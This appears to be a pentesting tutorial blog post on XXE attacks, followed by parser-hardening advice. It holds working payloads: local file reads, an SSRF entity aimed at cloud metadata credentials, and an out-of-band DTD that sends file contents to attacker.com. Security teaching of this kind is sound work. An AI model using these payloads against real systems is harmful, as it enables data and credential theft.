XXE Attack Tutorial: A Practical Guide for Pentesters

An XML External Entity (XXE) attack is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. By injecting a malicious external entity into an XML document, you can read local files on the server, interact with internal networks via Server-Side Request Forgery (SSRF), and in rare cases, achieve remote code execution. To exploit this, you must identify an endpoint that parses XML and modify the Document Type Definition (DTD) to point to a sensitive resource or an external server you control.

Understanding the Mechanics of an XXE Attack Tutorial

XML (Extensible Markup Language) is used everywhere, from SOAP APIs and SAML tokens to Office documents and SVG files. The core of an XXE vulnerability lies in the Document Type Definition (DTD). DTDs allow developers to define the structure of an XML document and use "entities" as variables. While internal entities are harmless, external entities tell the XML parser to fetch content from a URI.

Doing this against real scope needs clean infrastructure — a dedicated server you fully control and can reset between engagements keeps results reproducible and your tooling isolated.

When a poorly configured XML parser processes a request containing an external entity, it attempts to resolve the URI. If that URI points to a local file like /etc/passwd, the parser might include the contents of that file in its response. This is why XXE is frequently categorized under the A03:2021-Injection category in the OWASP Top 10 project.

Key Takeaway: XXE isn't just about reading files. It's about abusing the trust the XML parser has in the DTD. If the parser allows external entities and provides the output back to the user, you have a direct path to data exfiltration.

Types of XML Entities

Before jumping into exploitation, you need to distinguish between the types of entities you will encounter during a security assessment:

General Entities: Defined within the DTD and used within the XML body (e.g., &myentity;).
Parameter Entities: Only used within the DTD itself and prefixed with a percent sign (e.g., %myentity;). These are crucial for Blind XXE attacks.
External Entities: Use the SYSTEM or PUBLIC keywords to fetch data from an external source (file or URL).

Identifying XXE Entry Points in Modern Applications

Finding XXE entry points requires more than just looking for .xml files. Many modern applications use XML under the hood without advertising it. I often start my discovery phase by looking for any request that sends structured data to the server. If you see JSON, try changing the Content-Type header to application/xml and sending a basic XML payload. Some frameworks will automatically switch parsers based on the header.

Common places to find XXE include:

File Uploads: SVG images, DOCX/XLSX files, and PDF generators often use XML parsers.
SAML Assertions: Security Assertion Markup Language (SAML) uses XML for authentication tokens. Modifying these can lead to XXE.
SOAP APIs: By definition, SOAP is XML-based and frequently vulnerable if the underlying library isn't hardened.
RSS Feeds and Sitemaps: Any feature that imports or parses external feeds is a prime candidate.

In my experience, using a Burp Suite Tutorial for Pentesters to intercept and modify these requests is the most efficient way to test for vulnerabilities. Look for any application behavior that reflects your input back to the screen after processing an XML-based request.

Step-by-Step XXE Attack Tutorial: Exploiting LFI

The most common goal of an XXE attack is Local File Inclusion (LFI). This allows you to read sensitive files like configuration files, source code, or system credentials. Let's look at a practical scenario where a web application accepts a user profile update in XML format.

1. Identifying the Vulnerable Request

Imagine a request that looks like this:

POST /update-profile HTTP/1.1
Content-Type: application/xml

<user>
    <username>pentester</username>
    <email>[email protected]</email>
</user>

2. Injecting the Malicious DTD

To test for XXE, we insert a DOCTYPE definition before the root element. We define an external entity named xxe and point it to /etc/passwd (on Linux) or C:/windows/win.ini (on Windows).

POST /update-profile HTTP/1.1
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user>
    <username>&xxe;</username>
    <email>[email protected]</email>
</user>

3. Analyzing the Response

If the application is vulnerable, the server will process the entity and replace &xxe; with the contents of the password file. The response might look like this:

HTTP/1.1 200 OK
Content-Type: text/html

<p>Profile updated for user: root:x:0:0:root:/root:/bin/bash...</p>

This confirms the vulnerability. From here, you should follow a Pentest Checklist to systematically map out other sensitive files you can access, such as .bash_history, web.xml, or cloud metadata endpoints.

Exploiting SSRF via XXE

XXE is a powerful gateway to Server-Side Request Forgery (SSRF). Instead of using the file:// protocol, you can use http:// to force the server to make requests to internal resources that are otherwise inaccessible from the internet. This is particularly dangerous in cloud environments like AWS, Azure, or GCP.

For example, to hit the AWS metadata service, you would use the following payload:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]>

By chaining XXE with SSRF, I've seen red teams gain full control over cloud environments by stealing IAM role credentials. If you want to master this specific pivot, check out this SSRF Vulnerability Example for more advanced scenarios.

Protocol	Use Case	Example Payload
file://	Reading local system files	file:///etc/hostname
http://	SSRF, internal port scanning	http://192.168.1.1:80
php://filter	Reading source code (Base64)	php://filter/convert.base64-encode/resource=config.php
expect://	Remote Code Execution (RCE)	expect://id

What if the application parses the XML but doesn't return any output in the response? This is a Blind XXE. You can't see the file contents directly, but you can still confirm the vulnerability and exfiltrate data using "Out-of-Band" (OOB) techniques.

Using DNS or HTTP Interaction

The simplest way to confirm a blind XXE is to trigger a DNS lookup or an HTTP request to a server you control. Using Burp Collaborator is the industry standard for this. If you see a DNS hit from the target's IP, you know the parser is resolving external entities.

Advanced OOB Data Exfiltration

To actually read files in a blind scenario, you need to host a malicious DTD on your own server. This DTD will wrap the target file's content into a URL parameter and send it back to you. Here is how I usually set this up:

Step 1: Create a malicious DTD (external.dtd) on your server:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;

Step 2: Send the XXE payload to the target:

<!DOCTYPE test [
    <!ENTITY % remote SYSTEM "http://attacker.com/external.dtd">
    %remote;
]>

The target server fetches your DTD, reads the local file, and then makes a second request to your server containing the file's data in the query string. It’s a clever workaround for "silent" parsers.

Advanced XXE Scenarios: XInclude and Error-Based

Sometimes, you cannot control the DOCTYPE declaration because the application inserts your input into a pre-defined XML template. This is where XInclude becomes your best friend. XInclude is a part of the XML specification that allows for building a larger XML document from smaller chunks.

If you can only control a single value inside an XML element, try this:

<user>
    <username>
        <foo xmlns:xi="http://www.w3.org/2001/XInclude">
            <xi:include parse="text" href="file:///etc/passwd"/>
        </foo>
    </username>
</user>

Another technique is Error-Based XXE. If the application suppresses direct output but displays verbose error messages, you can craft a DTD that triggers a parsing error containing the contents of the file you want to read. This is often faster than OOB exfiltration because it doesn't require an external connection from the target server.

Expert Tip: When testing for XXE in file uploads, don't forget about XLSX or DOCX files. These are essentially ZIP archives full of XML files. Unzip the document, inject your XXE payload into workbook.xml or document.xml, re-zip it, and upload. I've caught many "secure" enterprise apps this way.

How to Prevent XXE Vulnerabilities in Production

Fixing XXE isn't about sanitizing input strings; it's about configuring the XML parser correctly. The most effective defense is to completely disable DTDs (Document Type Definitions) or at least disable the support for external entities and external DTDs.

As a developer or AppSec engineer, you should consult the OWASP XXE Prevention Cheat Sheet for your specific language. Here is a quick reference for common environments:

Java: Use factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
PHP: Use libxml_disable_entity_loader(true); (Note: In PHP 8.0+, this is often the default behavior).
Python (lxml): Use resolve_entities=False when initializing the parser.
.NET: Set XmlResolver to null in XmlReaderSettings.

Beyond code fixes, implementing a Web Application Firewall (WAF) can help detect common XXE patterns, but it should never be your only line of defense. A determined attacker can often bypass WAFs using different encodings (like UTF-16) that the WAF might not inspect properly. For a broader look at application defense, refer to our Web Application Security Testing Guide.

Summary of XXE Impact

The impact of XXE ranges from low to critical depending on the environment. In a standard web app, it usually results in high-severity LFI. In a cloud-native microservices architecture, it can lead to a full cluster compromise via SSRF against the metadata service or internal Kubelet APIs.

If you are just starting out in security research, XXE is one of the most rewarding vulnerabilities to master. It requires a solid understanding of how data flows through an application and how different protocols interact. For more hands-on practice, I highly recommend checking out OWASP Top 10 Explained to see how XXE fits into the larger threat landscape.

Frequently Asked Questions

What is the difference between XXE and XEE?

XEE (XML Entity Expansion) usually refers to "Billion Laughs" style DoS attacks where entities are nested to consume memory. XXE (XML External Entity) specifically refers to using the SYSTEM keyword to access external URI resources like files or network paths.

Can XXE lead to Remote Code Execution (RCE)?

Yes, but it's rare. RCE via XXE typically happens if the PHP expect module is loaded and enabled, or if you can use XXE to upload a malicious file and then trigger it, or by reaching an internal management API via SSRF.

How do I test for XXE if the server blocks the file:// protocol?

Try using other protocols like http:// for SSRF, php://filter to encode content in Base64, or netdoc:// on Java-based systems. Sometimes simple wrappers like gopher:// can also be used to bypass basic filters.

Is XXE still relevant in 2024?

Absolutely. While many modern frameworks have disabled external entity resolution by default, legacy systems, complex enterprise integrations, and niche file format parsers (like those for CAD files or specialized medical data) remain frequently vulnerable.

Related Vulnerabilities & Techniques

CWE-918: Server-Side Request Forgery (SSRF)CWE-611: XML External Entity (XXE)CWE-22: Path Traversal T1046: Network Service Discovery T1190: Exploit Public-Facing Application

White Hats Nepal Team

Security researchers and penetration testers sharing real-world vulnerability research, exploitation techniques, and defense strategies.